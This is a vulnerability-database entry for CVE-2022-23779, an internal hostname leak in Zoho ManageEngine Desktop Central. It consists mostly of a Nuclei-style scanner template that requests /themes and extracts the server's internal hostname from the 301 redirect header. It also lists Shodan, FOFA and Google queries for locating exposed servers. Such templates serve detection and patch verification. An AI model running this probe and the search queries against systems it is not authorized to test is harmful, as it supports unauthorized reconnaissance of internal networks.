CVE-2022-23779: Zoho ManageEngine - Internal Hostname Disclosure

日期: 2025-08-01 | 影响软件: Zoho ManageEngine | POC: 已公开

漏洞描述

Zoho ManageEngine Desktop Central before 10.1.2137.8 exposes the installed server name to anyone. The internal hostname can be discovered by reading HTTP redirect responses.

PoC代码[已公开]

id: CVE-2022-23779

info:
  name: Zoho ManageEngine - Internal Hostname Disclosure
  author: cckuailong
  severity: medium
  description: Zoho ManageEngine Desktop Central before 10.1.2137.8 exposes the installed server name to anyone. The internal hostname can be discovered by reading HTTP redirect responses.
  impact: |
    An attacker could use the disclosed internal hostnames to plan targeted attacks, gain unauthorized access, or perform reconnaissance on the internal network.
  remediation: |
    Apply the latest security patch or update provided by Zoho ManageEngine to fix the internal hostname disclosure vulnerability.
  reference:
    - https://www.manageengine.com/products/desktop-central/cve-2022-23779.html
    - https://github.com/fbusr/CVE-2022-23779
    - https://nvd.nist.gov/vuln/detail/CVE-2022-23779
    - https://github.com/soosmile/POC
    - https://github.com/zecool/cve
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2022-23779
    cwe-id: CWE-200
    epss-score: 0.40294
    epss-percentile: 0.97261
    cpe: cpe:2.3:a:zohocorp:manageengine_desktop_central:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: zohocorp
    product: manageengine_desktop_central
    shodan-query: http.title:"manageengine desktop central 10"
    fofa-query:
      - app="ZOHO-ManageEngine-Desktop"
      - title="manageengine desktop central 10"
      - app="zoho-manageengine-desktop"
    google-query: intitle:"manageengine desktop central 10"
  tags: cve,cve2022,zoho,exposure,zohocorp

http:
  - method: GET
    path:
      - "{{BaseURL}}/themes"

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - '/themes/'
          - 'text/html'
        condition: and

      - type: word
        part: location
        negative: true
        words:
          - '{{Host}}'

      - type: word
        words:
          - '<center><h1>301 Moved Permanently</h1></center>'

      - type: regex
        part: location
        regex:
          - 'https?:\/\/(.*):'

      - type: status
        status:
          - 301

    extractors:
      - type: regex
        group: 1
        regex:
          - 'https?:\/\/(.*):'
        part: location
# digest: 4a0a00473045022100f216a7024b7472296f3d50795f47e50530bda413054d299be9753935bef0d83b02202b94cc49231dfaadd374f595b609562e4057b98f79b9c06c5c67129a923bd5b1:922c64590222798bb761d5b6d8e72950

相关漏洞推荐